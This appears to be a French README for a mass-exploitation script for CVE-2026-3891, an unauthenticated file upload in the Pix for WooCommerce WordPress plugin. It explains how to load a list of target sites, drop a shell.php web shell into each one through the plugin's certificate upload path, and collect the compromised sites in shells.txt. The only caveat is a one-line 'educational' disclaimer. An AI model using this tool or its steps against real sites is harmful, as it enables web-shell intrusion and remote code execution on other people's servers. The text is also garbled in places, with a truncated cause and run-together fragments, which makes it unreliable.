
Pix pour WooCommerce <= 1.5.0 - Téléchargement de fichier arbitraire non authentifié
Pix for WooCommerce <= 1.5.0 - Téléchargement Arbitraire de Fichier Non Authentifié
Le plugin Pix for WooCommerce pour WordPress est vulnérable à un téléchargement arbitraire de fichier non authentifié en raison de :
dans la fonction lkn_pix_for_woocommerce_c6_save_settings dans toutes les versions jusqu'à 1.5.0 incluse.
Cela permet à des attaquants distants non authentifiés de télécharger des fichiers arbitraires, menant à une Exécution de Code à Distance (RCE).
CVE-2026-38919.8 (Critical)CVE-2026-3891.py@Kxploitpip install requests rich
Créez un fichier :
list.txt
Exemple :
http://example.com
https://target.com
victim-site.com
Si le protocole est manquant → le script ajoute automatiquement
http://
Placez votre fichier shell dans le même répertoire :
shell.php
python3 CVE-2026-3891.py
Le script demandera :
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
Ce projet est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
Nxploited